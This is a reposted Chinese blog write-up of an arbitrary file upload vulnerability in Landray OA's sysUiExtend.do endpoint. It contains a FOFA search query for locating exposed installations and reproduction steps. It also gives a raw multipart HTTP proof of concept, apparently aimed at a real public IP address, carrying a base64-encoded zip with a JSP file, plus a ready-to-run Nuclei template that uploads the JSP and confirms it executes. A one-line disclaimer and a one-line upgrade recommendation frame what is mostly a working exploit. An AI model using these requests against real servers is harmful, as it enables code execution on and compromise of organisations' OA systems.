devbox
我家小花儿
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

蓝凌OA sysUiExtend.do 任意文件上传漏洞_蓝凌oa任意文件上传

作者:我家小花儿 | 2024-02-20 05:17:16

蓝凌oa任意文件上传

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

蓝凌智能OA是一款针对中小企业的移动化智能办公产品 ,融合了钉钉数字化能力与蓝凌多年OA产品与服务经验,能全面满足企业日常办公在线、企业文化在线、客户管理在线、人事服务在线、行政务服务在线等需求。

蓝凌OAsysUiExtend.do接口处存在任意文件上传漏洞,未恶意攻击者可能会利用此漏洞获取敏感信息,对系统造成危害。

Ⅱ、fofa语句

app="Landray-OA系统"

Ⅲ、漏洞复现

1、验证漏洞是否可以利用,访问

https://127.0.0.1/api///sys/ui/sys_ui_extend/sysUiExtend.do?method=upload

2、构造上传文件,ceshi.jsp和ui.ini,然后放在同一文件夹下打包,id值为上传后的路径

3、使用工具对压缩包进行base64编码

UEsDBBQAAAAIAEqZOVht1Sg4ZAAAAG8AAAAJAAAAY2VzaGkuanNwHcgxDsIwDAXQq6SVKsWLL1DEiBgRDMxW+wWurDgEt1wfyvjeYUi+BtemJazk/gwzT3dvNnc9jQWftMgmrM4nNWSp1XSSUC/8QFwhdpF45obXinfsd0PbDPFvIuIZPyHTmIbjF1BLAwQUAAAACABFmTlYwM9p8xgAAAAhAAAABgAAAHVpLmluactMsU1OLc7I5OXKS8xNhbFLMkpzkyAcAFBLAQIUABQAAAAIAEqZOVht1Sg4ZAAAAG8AAAAJACQAAAAAAAAAIAAAAAAAAABjZXNoaS5qc3AKACAAAAAAAAEAGABt7QEVf0/aAVJa1hh/T9oB/NpO8n5P2gFQSwECFAAUAAAACABFmTlYwM9p8xgAAAAhAAAABgAkAAAAAAAAACAAAACLAAAAdWkuaW5pCgAgAAAAAAABABgAB6q4Dn9P2gEhP3qQf0/aAfzaTvJ+T9oBUEsFBgAAAAACAAIAswAAAMcAAAAAAA==

POC

  1. POST /api///sys/ui/sys_ui_extend/sysUiExtend.do?method=getThemeInfo HTTP/1.1
  2. Host: 183.24.70.68:8888
  3. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  4. Accept-Encoding: gzip, deflate
  5. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
  6. Content-Type: multipart/form-data; boundary=---------------------------260140030128010173621878123124
  7. Accept: application/json, text/javascript, */*; q=0.01
  8. X-Requested-With: XMLHttpRequest
  9.  
  10. -----------------------------260140030128010173621878123124
  11. Content-Disposition: form-data; name="file"; filename="test.zip"
  12. Content-Type: application/x-zip-compressed
  13.  
  14. {{base64dec(UEsDBBQAAAAIADUXOVhnHHe5FwAAAB4AAAAGAAAAdWkuaW5py0yxLUktLuHlykvMTYUySzJKc5PAbABQSwMEFAAAAAgAR1U5WIRhB60eAAAAHAAAAAcAAAB3bGYuanNws1FVyC8t0SsoyswrycnTUDI0MjYxNVPStFZQtQMAUEsBAhQAFAAAAAgANRc5WGccd7kXAAAAHgAAAAYAJAAAAAAAAAAgAAAAAAAAAHVpLmluaQoAIAAAAAAAAQAYAACXXDX3TtoBnR2GIDlP2gEDI8ASOU/aAVBLAQIUABQAAAAIAEdVOViEYQetHgAAABwAAAAHACQAAAAAAAAAIAAAADsAAAB3bGYuanNwCgAgAAAAAAABABgAgLDFGThP2gGYieMYOU/aAQMjwBI5T9oBUEsFBgAAAAACAAIAsQAAAH4AAAAAAA==)
  15. }}
  16. -----------------------------260140030128010173621878123124--

4、构建poc

5、访问

  1. https://127.0.0.1/resource/ui-ext/id值/上传的文件名
  2. https://127.0.0.1/resource/ui-ext/ceshi/ceshi.jsp

 

Ⅳ、Nuclei-POC

  1. id: LanDrayOA-sysUiExtend-do-uploadfile
  2.  
  3. info:
  4.   name: 蓝凌OAsysUiExtend.do接口处存在任意文件上传漏洞 未恶意攻击者可能会利用此漏洞获取敏感信息 对系统造成危害
  5.   author: WLF
  6.   severity: high
  7.   metadata: 
  8.     fofa-query: app="Landray-OA系统"
  9. variables:
  10.   filename: "{{to_lower(rand_base(10))}}"
  11.   boundary: "{{to_lower(rand_base(20))}}"
  12. http:
  13.   - raw:
  14.       - |
  15.         POST /api///sys/ui/sys_ui_extend/sysUiExtend.do?method=getThemeInfo HTTP/1.1
  16.         Host: {{Hostname}}
  17.         Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  18.         Accept-Encoding: gzip, deflate
  19.         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
  20.         Content-Type: multipart/form-data; boundary=---------------------------260140030128010173621878123124
  21.         Accept: application/json, text/javascript, */*; q=0.01
  22.         X-Requested-With: XMLHttpRequest
  23.         
  24.         -----------------------------260140030128010173621878123124
  25.         Content-Disposition: form-data; name="file"; filename="{{filename}}.zip"
  26.         Content-Type: application/x-zip-compressed
  27.  
  28.         {{base64_decode("UEsDBBQAAAAIAEqZOVht1Sg4ZAAAAG8AAAAJAAAAY2VzaGkuanNwHcgxDsIwDAXQq6SVKsWLL1DEiBgRDMxW+wWurDgEt1wfyvjeYUi+BtemJazk/gwzT3dvNnc9jQWftMgmrM4nNWSp1XSSUC/8QFwhdpF45obXinfsd0PbDPFvIuIZPyHTmIbjF1BLAwQUAAAACABFmTlYwM9p8xgAAAAhAAAABgAAAHVpLmluactMsU1OLc7I5OXKS8xNhbFLMkpzkyAcAFBLAQIUABQAAAAIAEqZOVht1Sg4ZAAAAG8AAAAJACQAAAAAAAAAIAAAAAAAAABjZXNoaS5qc3AKACAAAAAAAAEAGABt7QEVf0/aAVJa1hh/T9oB/NpO8n5P2gFQSwECFAAUAAAACABFmTlYwM9p8xgAAAAhAAAABgAkAAAAAAAAACAAAACLAAAAdWkuaW5pCgAgAAAAAAABABgAB6q4Dn9P2gEhP3qQf0/aAfzaTvJ+T9oBUEsFBgAAAAACAAIAswAAAMcAAAAAAA==")}}        
  29.  
  30.         -----------------------------260140030128010173621878123124--
  31.  
  32.       - |
  33.         GET /resource/ui-ext/ceshi/ceshi.jsp HTTP/1.1
  34.         Host: {{Hostname}}
  35.         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
  36.  
  37.     matchers:
  38.       - type: dsl
  39.         dsl:
  40.           - status_code==200 && contains_all(body,"Hello World!")

Ⅴ、修复建议

升级至安全版本

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/我家小花儿/article/detail/118604
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号